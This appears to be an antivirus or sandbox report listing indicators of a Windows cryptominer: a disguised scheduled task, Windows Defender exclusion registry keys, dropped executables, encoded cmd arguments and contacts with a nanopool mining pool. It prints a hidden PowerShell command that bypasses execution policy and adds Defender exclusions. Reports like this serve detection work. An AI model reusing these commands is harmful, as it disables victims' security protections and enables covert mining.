Technical Information
- <SYSTEM32>\tasks\windowsupdatetask
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\cversions_etp6\' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\cversions_etp6\imgcacheam0.exe' = '00000000'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force; Add-MpPreference -ExclusionPath 'C:\Users' -F...
- <SYSTEM32>\cmd.exe
- %LOCALAPPDATA%\cversions_etp6\imgcacheam0.exe.tmp
- %APPDATA%\microsoft\imgcacheam0.exe
- %TEMP%\th8e56.tmp
- from %LOCALAPPDATA%\cversions_etp6\imgcacheam0.exe.tmp to %LOCALAPPDATA%\cversions_etp6\imgcacheam0.exe
- 'bu#####curityrelay.com':443
- 'x1.#.lencr.org':80
- 'xm#####.nanopool.org':10343
- http://x1.#.lencr.org/
- 'bu#####curityrelay.com':443
- 'xm#####.nanopool.org':10343
- DNS ASK bu#####curityrelay.com
- DNS ASK x1.#.lencr.org
- DNS ASK xm#####.nanopool.org
- '%LOCALAPPDATA%\cversions_etp6\imgcacheam0.exe'
- '<SYSTEM32>\cmd.exe' --encargs 585e011d1b121117581f0004101f4541555e0a520d1e175f1006545c1b120b1d051c0a1e5b1c17154f4255414140455f00535d4b424b26183f250e3a13192b3c420901262f2b3d373646243721220a050c3e5613271c56463710524...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force; Add-MpPreference -ExclusionPath 'C:\Users' -F...' (with hidden window)